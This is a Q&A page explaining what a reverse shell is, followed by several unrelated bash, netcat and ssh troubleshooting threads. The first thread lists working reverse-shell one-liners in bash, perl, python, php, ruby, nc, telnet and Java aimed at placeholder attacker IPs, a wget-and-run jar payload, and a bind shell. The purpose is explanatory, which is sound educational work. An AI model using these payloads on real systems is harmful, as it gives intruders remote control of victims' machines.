What is a reverse shell? [closed]

Could someone explain in depth what a reverse shell is and in what cases we are supposed to use it?
I found this http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet on the topic. What is the meaning of:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

It's an (insecure) remote shell initiated by the target. That's the opposite of a "normal" remote shell, which is initiated by the source.
Let's try it with localhost instead of 10.0.0.1:
Open two tabs in your terminal.
In tab 1, open TCP port 8080 and wait for a connection:
nc localhost -lp 8080
In tab 2, open an interactive shell and redirect its I/O streams to a TCP socket:
bash -i >& /dev/tcp/localhost/8080 0>&1
where
bash -i "If the -i option is present, the shell is interactive."
>& "This special syntax redirects both, stdout and stderr to the specified target."
(argument for >&) /dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
0>&1 redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.
Cf. http://wiki.bash-hackers.org/syntax/redirection
Rejoice as you have a prompt in tab 1.
Now imagine not using localhost, but some remote IP.

In addition to the excellent answer by @Kay: the reason it is called a reverse shell is that it is the opposite of a bind shell.
Bind shell - the attacker's machine acts as a client and the victim's machine acts as a server: the victim opens a communication port and waits for the client to connect, after which the attacker issues commands that are executed remotely (with respect to the attacker) on the victim's machine. This is only possible if the victim's machine has a public IP and is reachable over the internet (disregarding firewalls etc. for the sake of brevity).
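As a minimal sketch (assuming a netcat variant that supports -e, such as traditional netcat or ncat; the OpenBSD variant lacks it, and port 4444 is arbitrary):
# on the victim (server side): expose a shell on TCP port 4444
nc -l -p 4444 -e /bin/sh
# on the attacker (client side): connect and type commands
nc <victim_ip> 4444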
Now what if the victim's machine is NATed and hence not directly reachable? One possible solution: the victim's machine may not be reachable, but my (the attacker's) machine is. So let me open a server at my end and let the victim connect to me. This is what a reverse shell is.
Reverse Shell - attacker's machine (which has a public IP and is reachable over the internet) acts as a server. It opens a communication channel on a port and waits for incoming connections. Victim's machine acts as a client and initiates a connection to the attacker's listening server.
This is exactly what is done by the following:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
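For this to work, a listener must already be waiting on the attacker's machine (10.0.0.1); for example, with netcat (exact flag spelling varies between netcat variants):
nc -lvp 8080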

Examples of reverse shells in various languages. A word of warning: these are dangerous.
bash shell
bash -i >& /dev/tcp/1.1.1.1/10086 0>&1;
perl shell
perl -e 'use Socket;$i="1.1.1.1";$p=10086;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
python shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",10086));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';
php shell
php -r '$sock=fsockopen("1.1.1.1",10086);exec("/bin/sh -i <&3 >&3 2>&3");';
ruby shell
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("1.1.1.1","10086");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end';
nc shell
nc -c /bin/sh 1.1.1.1 10086;
telnet shell
telnet 1.1.1.1 10086 | /bin/bash | telnet 1.1.1.1 10087; # Remember to also listen on your machine on port 10087/tcp
mknod test p; telnet 1.1.1.1 10086 0<test | /bin/bash 1>test;
java jar shell
wget http://1.1.1.1:9999/revs.jar -O /tmp/revs1.jar;
java -jar /tmp/revs1.jar;
import java.io.IOException;

public class ReverseShell {
    public static void main(String[] args) throws IOException, InterruptedException {
        Runtime r = Runtime.getRuntime();
        String[] cmd = {"/bin/bash", "-c",
                "exec 5<>/dev/tcp/1.1.1.1/10086;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}
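For completeness, the revs.jar referenced above could be built from this class roughly as follows (a sketch; the jar and class names mirror the snippet, and cfe sets the jar's entry point):
javac ReverseShell.java
jar cfe revs.jar ReverseShell ReverseShell.class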

A reverse shell means getting a connection from the victim or target to your computer. You can think of it this way: your computer (the attacker's) acts like a server and listens on a port you specify; you then make sure the victim connects to you by sending a SYN packet (whether this uses TCP or UDP depends on the reverse shell implementation). The connection then appears as if the victim himself intended to connect to us.
Now, in order to trick the victim into running the program, you need to perform social engineering attacks or do DNS spoofing.
A successful reverse shell can bypass most firewalls, both host-based and network-based, because the connection is initiated from the inside and looks like ordinary outbound traffic.
Reverse shells come in different flavors: TCP-based, HTTP-based, or UDP-based.
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Bash provides the special pathname /dev/tcp for opening TCP sockets (it is a bash feature, not a real device file). So the command above is basically opening a TCP socket.
The general format is /dev/tcp/<ip address>/<port>.
Now listen on port 8080 using netcat:
nc -l -p 8080 -vv
A simple netcat-based reverse shell is obtained by executing the following on the victim:
nc -e /bin/bash 10.0.0.1 8080. It makes the victim connect to your IP address on port 8080, assuming 10.0.0.1 is the attacker's IP.
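If the victim's netcat lacks -e (the OpenBSD variant deliberately omits it), a well-known FIFO-based equivalent is:
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 8080 > /tmp/f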

In general, a reverse shell is a payload that functions as a shell to the operating system. This means that it either uses the OS API directly, or indirectly through spawning shells in the background, to perform read/write operations on the target computer's memory and hardware. If you can get the payload onto the target computer and get them to execute it, it can connect to the attacker's IP and spawn a thread that waits on a port for the attacker to send a command over some protocol like HTTP. It can then parse the command and use the OS API to perform the operation and send status back to the attacker, or it can spawn a shell in the background with the command as a command-line argument and redirect the output to a file, which it can then read and send back to the attacker.
The common example you see is a payload that uses the OS API to spawn a shell process, supplying a command line that opens a child shell and redirects the stdin/stdout of that shell to network sockets.
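As a sketch of that pattern in plain bash (with 10.0.0.1:8080 standing in for the attacker's listener), the /dev/tcp trick can be written out with an explicit file descriptor:
# open a bidirectional TCP socket on file descriptor 5
exec 5<>/dev/tcp/10.0.0.1/8080
# read commands from the attacker, run them, send stdout/stderr back
while read -r line <&5; do
    eval "$line" >&5 2>&5
done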

In normal hacking you try to connect to your target and attack it from there;
a reverse shell is when your target connects to the attacker via a payload or something similar.
There is a good tutorial on this by NetworkChuck.
A reverse shell is also a basic form of RAT (remote access trojan).

Related

How can I communicate with a unix socket using one connection in a bash script?

I want to read/write to a unix socket in a bash script, but only do it with one connection. All of the examples I've seen using nc say to open different socket connections for every read/write.
Is there a way to do it using one connection throughout the script for every read/write?
(nc only lets me communicate with the socket in a one shot manner)
Run the whole script with output redirected:
{
command
command
command
} | nc -U /tmp/cppLLRBT-socket
However, pipes are one-way, so you can do this for reading or writing, but not both.
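One workaround for a single persistent, bidirectional connection is a bash coprocess (a sketch assuming bash 4+ and the socket path from the question):
# start one long-lived nc connection as a coprocess
coproc NC { nc -U /tmp/cppLLRBT-socket; }
# write a request into the socket, then read one reply line back
echo "first request" >&"${NC[1]}"
read -r reply <&"${NC[0]}"
# the same connection stays open for subsequent reads/writes
echo "second request" >&"${NC[1]}"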

where to send daemon optional output so it's readable

My daemon has option
-r WhereShouldIOutputAdditionalData
The daemon is listening on port 26542 and writes on the same port. I want the additional data to be output to 26542 as well. I tried using
-r /dev/tcp/127.0.0.1/26542
and it doesn't work. When I do
> /dev/tcp/127.0.0.1/26542
I get connection refused. The daemon I use is vowpal_wabbit, a machine learning library. Any ideas?
Per an unofficial man page at
https://github.com/JohnLangford/vowpal_wabbit/wiki/Command-line-arguments
I see
-r [ --raw_predictions ] arg File to output unnormalized predictions to
So I think the -r argument is expecting a sort of /path/to/logs/raw_preds.log argument.
With this, you'll have "captured the optional output so it is readable." You could open a separate window and use the dev/admin's old friend tail -f /path/to/logs/raw_preds.log to see the info as it is written to the file.
If you really want it all to appear on one port (which isn't exactly clear from your question), you'd need a separate program that can multiplex the outputs AND has control of your required port number. You'll also need to be concerned about the correct ordering of the output.
IHTH.
I'm sorry, but what you want to do is impossible, for two reasons:
First, bash cannot listen on a given TCP port.
For example, you cannot write a TCP server daemon in plain bash (you could use netcat for that); you can only connect() to a TCP port from bash.
Second, it is impossible to listen on the same TCP ip:port that is already in the LISTEN state for another process.
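That said, if the predictions really must be readable over TCP, netcat can do the listening on a separate port (a sketch; the log path comes from the other answer, and port 26543 plus the flags are assumptions based on traditional netcat):
# crude: serve the raw predictions file to each client that connects
while true; do
    nc -l -p 26543 < /path/to/logs/raw_preds.log
done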

Not closing ssh

I have a ksh88 shell script which creates a folder on the remote host using the following command:
ssh $user@$host "mkdir -p $somedir" 2>> $Log
and after that transfers a bunch of files in a loop using this
scp -o keepalive=yes $somedir/$file $user@$host:$somedir
I wonder if first command will leave connection open after script ends?
Each of the commands opens and closes its own connection. It's easy to use a tool like tcpdump to verify this.
This is a consequence of the fact that the exit() system call used to terminate a process closes all open file descriptors including socket file descriptors. Closing a socket closes the connection behind the socket.
New-enough versions of ssh have the ability to multiplex several virtual connections over a single physical connection. So what you could do is start up some long-running ssh command in the background with connection multiplexing enabled, and then subsequent connections will re-use that connection with much faster startup times. See the manpage for ssh_config for info on connection multiplexing, relevant options are ControlMaster and ControlPath.
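A minimal ~/.ssh/config sketch (the Host name is a placeholder; ControlPersist is a further ssh_config option that keeps the master connection alive after the first command exits):
Host myhost
    ControlMaster auto
    ControlPath ~/.ssh/cm-%r@%h:%p
    ControlPersist 10m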
But as William Pursell suggests, rsync is probably easier and faster, if it's an option.
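For completeness, a sketch of the rsync alternative, reusing the $user/$host/$somedir variables from the question (a single invocation replaces the whole scp loop and uses one connection):
rsync -av -e ssh "$somedir/" "$user@$host:$somedir/"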

How to connect stdin of a list of commands (with pipes) to one of those commands

I need to give the user the ability to send/receive messages over the network (using netcat) while the connection is established (the user, in this case, is using nc as a client). The problem is that I need to send a line before the user starts interacting. My first attempt was:
echo 'my first line' | nc server port
The problem with this approach is that nc closes the connection when echo finishes its execution, so the user can't send commands via stdin because the shell is given back to him (and the answer from the server is also never received, because the server takes some seconds to start answering and, as nc has already closed the connection, the answer never reaches the user).
I also tried grouping commands:
{ echo 'my first line'; cat -; } | nc server port
It works almost the way I need, but if the server closes the connection, it waits until I press <ENTER> to give me the shell again. I need to get the shell back when the server closes the connection (in this case, the client - my nc command - will never close the connection, unless I press Ctrl+C).
I also tried named pipes, without success.
Do you have any tip on how to do it?
Note: I'm using openbsd-netcat.
You probably want to look into expect(1).
It is cat that waits for the 'enter'.
You may write a script, executed after nc, to kill the cat; then it will return to the shell automatically.
You can try this to see if it works for you.
perl -e "\$|=1;print \"my first line\\n\" ; while (<STDIN>) {print;}" | nc server port
This one should produce the behaviour you want:
echo "Here is your MOTD." | nc server port ; nc server port
I would suggest you use cat << EOF, but I think it will not work as you expect.
I don't know how you can send EOF when the connection is closed.
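For the record, the cat << EOF variant would look something like this; it shares the same limitation, since the trailing cat still blocks on stdin after the server closes:
{
    cat << EOF
my first line
EOF
    cat
} | nc server port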

Spawn subshell for SSH and continue with program flow

I'm trying to write a shell script that automates certain startup tasks based on my location (home/campusA/campusB). I go to university and take classes at two different campuses (hence campusA/campusB). My location is determined by which wireless network I'm connected to. For the purposes of this script, we can assume that I will be connected to one of these networks when the script is called and that my script knows which one I'm connected to, based on a call to iwconfig.
This is what I want it to do:
cat file1 > file2 # always do this, regardless of where I am
if I'm at home:
start tweetdeck, thunderbird, skype
else if I'm at campusA:
activate the login script # I need to login on a webform before I get internet access.
# I have written a script to automate this.
# Wait for this script to finish before doing anything else
myProg2 & # I want myProg2 running in the background until I shutdown my computer.
else if I'm at campusB:
ssh username@domain # this is the problematic line
myProg2 & # I want myProg2 running in the background until I shutdown my computer.
start tweetdeck, thunderbird
close the terminal with the "exit" command
The problem is that campusB's wireless network is behind a firewall, which grants me internet access ONLY after I successfully ssh to username@domain. After a successful ssh, I need to keep the terminal window active in order to keep the internet access. If I close the terminal window, I lose internet access (this is bad).
When I try doing just ssh username@domain, the script stops because I don't exit the ssh command. I can't ^C out of it, which means that the rest of the script is never executed. I also have the same problem if I just close the terminal window in an attempt to kill the ssh session.
Some googling brought me to subshell, which I'm either using wrong or can't use to solve my problem. So how should I go about solving this problem? I'd appreciate any help - I've been at this for a while now and am unable to find anything helpful. If it makes a difference, I'd rather not store my ssh password in the script
Further, ampersanding the ssh call (ssh username@domain &) doesn't seem to do any good (can anyone explain why?)
Thank you in advance
EDIT
I must clarify, that the ssh connection has to be active in order for me to have internet access. Thus, when I close the terminal window, I need the ssh connection to still be active.
I had a script that looped on 6 servers, calling via ssh in the background. In 1 part of the script, there was a mis-behaving vendor application; the application didn't 'let go' of the connection properly. (other parts of the script using ssh in background worked fine).
I found that using ssh -t -t cured the problem. Maybe this can help you too.
(a teammate found this on the web, and we had spent so much time, I never went back to read the article that suggested this. The man page on our system gave no hint that such a thing was possible)
Hope this helps.
You may want to try to double background myProg2 to detach it from the tty:
# cf. "Wizard Boot Camp, Part Six: Daemons & Subshells",
# http://www.linux-mag.com/id/5981
(myProg2 &) &
Another option may be to use the daemon tool from the libslack package:
http://ingvar.blog.linpro.no/2009/05/18/todays-sysadmin-tip-using-libslack-daemon-to-daemonize-a-script/
Having an ssh with a pseudo-tty in a background shell
In addition to @shellter's answer, I would like to add some precision:
where @shellter said:
The man page on our system gave no hint that such a thing was possible
On my system (Debian 7 GNU/Linux), if I hit:
man -Pcol\ -b ssh| grep -A3 '^ *-t '
I could read:
-t      Force pseudo-tty allocation. This can be used to execute arbitrary
        screen-based programs on a remote machine, which can be very useful,
        e.g. when implementing menu services. Multiple -t options force tty
        allocation, even if ssh has no local tty.
Yes: Multiple -t options force tty allocation, even if ssh has no local tty.
This means: if you remotely run a tool that requires access to a pseudo-terminal (a pty such as /dev/pts/0), you can run it by using the -t switch.
But this works only if ssh is itself run from a shell console (i.e. it has its own pty). If you plan to run it in a shell session without a console, such as a background script, you may use multiple -t options to force pseudo-tty allocation from ssh.
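For example, a sketch of forcing a pty from a script that has no terminal of its own (username@domain as elsewhere in this question; top is just an arbitrary screen-based program):
# double -t forces pty allocation even though stdin is not a terminal
ssh -t -t username@domain top </dev/null &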
Multiple ssh shells on one ssh connection
In addition to the answers from @tommy and @geekosaur, I would like to add some precision:
@tommy points to a very interesting feature of ssh. I'm not sure this has a lot to do with the answer, but when speaking about long-lived connections, this feature has to be clearly understood.
Once a connection is established, ssh can (and knows how to) use it to drive a lot of things over this one connection:
-L lets you forward remote TCP connections to local machines/networks. (The full syntax is: -L localip:localport:distip:distport, where localip can be specified to permit other hosts from the same local domain to access the same TCP bind, and distip can be any host on the distant network, not only localhost.) Sample: -L 192.168.1.31:8443:google.com:443 permits any host from the local domain to reach google through your host: http://192.168.1.31:8443
-R Same remarks, in the reverse direction!
-M tells ssh to open a local unix socket for binding subsequent ssh sessions. Simply open two terminal windows. First, in both windows, hit: ssh somewhere, then hit netstat -tan | grep :22 or netstat -tan | grep 192.168.1.31:22 (assuming 192.168.1.31 is your own host's IP); you will see two TCP connections.
Then close all your ssh sessions. In the first terminal, hit: ssh -M somewhere, and in the second, simply ssh somewhere. You may see in the second terminal:
$ ssh somewhere
+ ssh somewhere
Last login: Mon Feb 3 08:58:01 2014 from elsewhere
If you now hit netstat -tan | grep 192.168.1.31:22 (in either of the two opened ssh sessions) you will see that there is only one TCP connection.
This kind of feature can be used in combination with -L and maybe some sleep 86399...
To work around a TCP-killer router that closes every TCP connection inactive for more than 120 seconds, I run:
ssh -M somewhere 'while :;do uptime;sleep 60;done'
This ensures the connection stays up even if I don't hit a key for more than two minutes.
Here are a few thoughts that might help.
Sub-shells
Sub-shells fork new processes, but don't return control to the calling shell. If you want to fork a sub-shell to do the work for you, then you'll need to append a & to the line.
(ssh username@domain) &
But this doesn't look like a compelling reason to use a sub-shell. If you had a number of commands you wanted to execute in order relative to each other, yet in parallel with the calling shell, then maybe it would be worth it. For example...
(dothis.sh; thenthis.sh; andthislastthingtoo.sh) &
Forking
I'm not sure why & isn't working for you, but it may be worth looking into nohup as well. This makes the command "immune" to hangup signals.
nohup ssh username@domain (try with and without the & at the end)
Passwords
Not storing passwords in the script is essential for any ssh automation. You can accomplish that using public key cryptography, which is an inherent feature of ssh. I won't go into the details here because there are a number of great resources all across the interwebs on setting this up. I strongly suggest investigating this further.
HOWTO: set up ssh keys - Paul Keck, 2001
SSH Keys - archlinux.org
SSH with authentication key instead of password - Debian Administration
Secure Shell - Wikipedia, the free encyclopedia
If you do go this route, I also suggest running ssh in "batch mode" which will disable password querying and will automatically disconnect from the server if it becomes unresponsive after 5 minutes.
ssh -o 'BatchMode=yes' username@domain
Persistence
Then if you want to persist the connection, run some silly loop in bash! :)
ssh -o 'BatchMode=yes' username@domain "while (( 1 == 1 )); do sleep 60; done"
The problem with & is that ssh loses access to its standard input (the terminal), so when it goes to read something to send to the other side it either gets an error and exits, or is killed by the system with SIGTTIN which will implicitly suspend it. The -n and -f options are used to deal with this: -n tells it not to use standard input, -f tells it to set up any necessary tunnels etc., then close the terminal stream.
So the best way to do this is probably to do
ssh -L 9999:localhost:9999 -f host & # for some random unused port
and then manually kill the ssh before logout. Alternately,
ssh -L 9999:localhost:9999 -n host 'while :; do sleep 86400; done' </dev/null &
(The redirection is to make sure the SIGTTIN doesn't happen anyway.)
While you're at it, you may want to save the process ID and shut it down from your .logout/.bash_logout:
ssh -L 9999:localhost:9999 -n host 'while :; do sleep 86400; done' < /dev/null & echo $! >~/.ssh_pid; chmod 0600 ~/.ssh_pid
and in .bash_logout:
if test -f ~/.ssh_pid; then
set -- $(sed -n 's/^\([0-9][0-9]*\)$/\1/p' ~/.ssh_pid)
if [ $# = 1 ]; then
kill $1 >/dev/null 2>&1
fi
rm ~/.ssh_pid
fi
The extra code there attempts to avoid someone sabotaging your ~/.ssh_pid, because I'm a professional paranoid.
(Code untested and may have typos)
It's been a while since I've used ssh, and I can't test it right now, but have you tried the -f switch?
ssh -f username@domain
The man page says it backgrounds ssh. Not sure why & wouldn't work, but I guess it's interpreting it as a command to be run on the remote machine.
Maybe screen + ssh would fit the bill as well?
Something like:
screen -d -m -S sessionName cmd
screen -d -m -S sessionName cmd &
# reconnect with
screen -r sessionName
